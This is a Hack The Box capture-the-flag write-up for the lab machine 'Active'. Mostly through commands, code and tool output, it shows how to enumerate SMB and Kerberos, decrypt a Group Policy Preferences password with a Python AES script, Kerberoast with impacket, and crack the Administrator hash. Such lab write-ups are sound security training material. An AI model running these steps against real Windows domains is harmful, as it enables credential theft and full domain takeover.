Writeup: Hack The Box - Machines - Active

(Updated: )
writeups
,

Description

  • Name: Active
  • IP: 10.10.10.100
  • Author: eks,mrb3n
  • Difficulty: 4.3/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.100

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2018-08-08 07:32:39Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49169/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49182/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2018-08-08 09:33:36
|_  start_date: 2018-08-08 06:06:17

Pwn

Using nullinux we can try to enumerate domains, shares and users from SMB.

P.S. is required to install smbclient and force client min protocol to SMB2 in /etc/samba/smb.conf.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
python3 nullinux.py -a 10.10.10.100

[*] Enumerating Shares for: 10.10.10.100
        Shares                     Comments
   -------------------------------------------
    \\10.10.10.100\ADMIN$          Remote Admin
    \\10.10.10.100\C$              Default share
    \\10.10.10.100\IPC$
    \\10.10.10.100\NETLOGON        Logon server share
    \\10.10.10.100\Replication     
    \\10.10.10.100\SYSVOL          Logon server share
    \\10.10.10.100\Users           

   [*] Enumerating: \\10.10.10.100\Replication
       .                                   D        0  Sat Jul 21 12:37:44 2018
       ..                                  D        0  Sat Jul 21 12:37:44 2018
       active.htb                          D        0  Sat Jul 21 12:37:44 2018

[*] Enumerating Domain Information for: 10.10.10.100
[-] Could not attain Domain SID

[*] Enumerating querydispinfo for: 10.10.10.100

[*] Enumerating enumdomusers for: 10.10.10.100

[*] Enumerating LSA for: 10.10.10.100

[*] Performing RID Cycling for: 10.10.10.100
[-] RID Failed: Could not attain Domain SID

[*] Testing 10.10.10.100 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.100

[-] No valid users or groups detected

Since we know the domain (ACTIVE, duh!) we can try to enumerate all username through the kerberos service and nmap NSE script.

1
2
3
4
5
88/tcp open  kerberos-sec
| krb5-enum-users: 
| Discovered Kerberos principals
|     administrator@ACTIVE
|_    dc@ACTIVE

In alternative to nmap we can use the metasploit module auxiliary/gather/kerberos_enumusers.

1
2
3
[+] 10.10.10.100:88 - User: "administrator" is present
[+] 10.10.10.100:88 - User: "dc" is present
[-] 10.10.10.100:88 - User: "guest" account disabled or locked out

First of all we downloaded the Replication share that do not require authentication:
smbclient //10.10.10.100/Replication -U ""%"" -c 'prompt OFF;recurse ON;mget *'

From the active.htb folder we got a lot of files and folders but searching for pass with ripgrep we can read in Groups.xml a GPP password.

1
2
3
4
5
6
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
    </User>
</Groups>

The cpassword tag is used to store the AES-256bit password for the Group Policy Preferences (GPP) created and saved in this XML file.

Microsoft published the private key which can be used to decrypt the password.

More info: https://adsecurity.org/?p=2288.

Now that we have the password encrypted and the private key we can try to get the decrypted password:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from Crypto.Cipher import AES
from base64 import b64decode

key = """
4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b
""".replace(" ", "").replace("\n", "").strip()

key = bytes.fromhex(key)

cpassword = b64decode("edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ==")

o = AES.new(key, AES.MODE_CBC, "\x00" * 16).decrypt(cpassword)

print(o.decode())

We got the GPP password: GPPstillStandingStrong2k18.

The XML should be only in the SYSVOL share but the sysadmin created the share Replication as backup with anonymous access compromising the security of the entire system.

Now that we have username and password we can rerun nullinux tool to check other informations

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
[*] Enumerating Shares for: 10.10.10.100
        Shares                     Comments
   -------------------------------------------
    \\10.10.10.100\ADMIN$          Remote Admin
    \\10.10.10.100\C$              Default share
    \\10.10.10.100\IPC$
    \\10.10.10.100\NETLOGON        Logon server share
    \\10.10.10.100\Replication     
    \\10.10.10.100\SYSVOL          Logon server share
    \\10.10.10.100\Users           

   [*] Enumerating: \\10.10.10.100\NETLOGON
       .                                   D        0  Wed Aug  8 12:02:39 2018
       ..                                  D        0  Wed Aug  8 12:02:39 2018

   [*] Enumerating: \\10.10.10.100\Replication
       .                                   D        0  Sat Jul 21 12:37:44 2018
       ..                                  D        0  Sat Jul 21 12:37:44 2018
       active.htb                          D        0  Sat Jul 21 12:37:44 2018

   [*] Enumerating: \\10.10.10.100\SYSVOL
       .                                   D        0  Wed Aug  8 12:02:40 2018
       ..                                  D        0  Wed Aug  8 12:02:40 2018
       active.htb                          D        0  Wed Jul 18 20:48:57 2018
       GHDLXVKonw                          D        0  Wed Aug  8 12:02:34 2018
       vHDsdRgOTM                          D        0  Wed Aug  8 12:02:40 2018
       WlCneTZBAq                          D        0  Wed Aug  8 12:01:57 2018

   [*] Enumerating: \\10.10.10.100\Users
       .                                  DR        0  Sat Jul 21 16:39:20 2018
       ..                                 DR        0  Sat Jul 21 16:39:20 2018
       Administrator                       D        0  Mon Jul 16 12:14:21 2018
       All Users                         DHS        0  Tue Jul 14 07:06:44 2009
       Default                           DHR        0  Tue Jul 14 08:38:21 2009
       Default User                      DHS        0  Tue Jul 14 07:06:44 2009
       desktop.ini                       AHS      174  Tue Jul 14 06:57:55 2009
       Public                             DR        0  Tue Jul 14 06:57:55 2009
       SVC_TGS                             D        0  Sat Jul 21 17:16:32 2018

[*] Enumerating Domain Information for: 10.10.10.100
[+] Domain Name: ACTIVE
[+] Domain SID: S-1-5-21-405608879-3187717380-1996298813

[*] Enumerating querydispinfo for: 10.10.10.100
    Administrator
    Guest
    krbtgt
    SVC_TGS

[*] Enumerating enumdomusers for: 10.10.10.100
    Administrator
    Guest
    krbtgt
    SVC_TGS

[*] Enumerating LSA for: 10.10.10.100

[*] Performing RID Cycling for: 10.10.10.100
500
501
502
503
504
    Administrator
505
    krbtgt
506
507
    Guest
508
509
510
511
512
513
514
515
    Domain Admins                       (Network/LocalGroup)
516
517
    Domain Users                        (Network/LocalGroup)
518
    Domain Guests                       (Network/LocalGroup)
519
    Schema Admins                       (Network/LocalGroup)
    Domain Computers                    (Network/LocalGroup)
520
    Domain Controllers                  (Network/LocalGroup)
521
522
    Cert Publishers                     (Network/LocalGroup)
523
    Enterprise Admins                   (Network/LocalGroup)
524
525
    Read-only Domain Controllers        (Network/LocalGroup)
    Group Policy Creator Owners         (Network/LocalGroup)
526
527
528
529
530

[*] Testing 10.10.10.100 for Known Users
    Administrator
    Guest
    krbtgt

[*] Enumerating Group Memberships for: 10.10.10.100
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
    Administrator
[+] Group: Domain Users
    Administrator
    krbtgt
    SVC_TGS
[+] Group: Domain Guests
    Guest
[+] Group: Domain Computers
[+] Group: Domain Controllers
    DC$
[+] Group: Schema Admins
    Administrator
[+] Group: Enterprise Admins
    Administrator
[+] Group: Group Policy Creator Owners
    Administrator
[+] Group: Read-only Domain Controllers
[+] Group: DnsUpdateProxy

[+] 5 USER(s) identified in 11 GROUP(s)
[*] Writing users to file: ./nullinux_users.txt

First of all we can see that now we access to Users share where the first flag should be.

Connecting as user SVC_TGS at the share //10.10.10.100/Users we can search for the user.txt file in \SVC_TGS\Desktop\.

Now that we have access to some shares we can check if we can find other credentials of interesting files.

With CrackMapExec we got a tons of modules and scripts to retrieve informations from SMB services (and others).

For example we can use the gpp_password to search the shares for others credentials.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
cme smb 10.10.10.100 -u "SVC_TGS" -p "GPPstillStandingStrong2k18" -M gpp_password

SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:ACTIVE) (signing:True) (SMBv1:False)
SMB         10.10.10.100    445    DC               [+] ACTIVE\SVC_TGS:GPPstillStandingStrong2k18 
GPP_PASS... 10.10.10.100    445    DC               [+] Found SYSVOL share
GPP_PASS... 10.10.10.100    445    DC               [*] Searching for potential XML files containing passwords
GPP_PASS... 10.10.10.100    445    DC               [*] Found active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.10.100    445    DC               [+] Found credentials in active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
GPP_PASS... 10.10.10.100    445    DC               Password: GPPstillStandingStrong2k18
GPP_PASS... 10.10.10.100    445    DC               userName: active.htb\SVC_TGS
GPP_PASS... 10.10.10.100    445    DC               noChange: 1
GPP_PASS... 10.10.10.100    445    DC               neverExpires: 1
GPP_PASS... 10.10.10.100    445    DC               description: 
GPP_PASS... 10.10.10.100    445    DC               acctDisabled: 0
GPP_PASS... 10.10.10.100    445    DC               newName: 
GPP_PASS... 10.10.10.100    445    DC               changeLogon: 0
GPP_PASS... 10.10.10.100    445    DC               action: U
GPP_PASS... 10.10.10.100    445    DC               fullName:

Since the username SVC_TGS recall the Kerberos TGS authentication we used impacket to ask Kerberos (port 88) the ticket for the Administrator user thanks to GetUserSPNs.py script.

GetUserSPNs.py ACTIVE.HTB/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

Sources:

With this hash we can start the cracking with hashcat (-m 13100).

The password for Administrator is Ticketmaster1968; we can validate those credentials with cme smb 10.10.10.100 -u "Administrator" -p "Ticketmaster1968" --shares and see what permission Administrator has over those shares.

Now we can access the C$ share and read the root flag.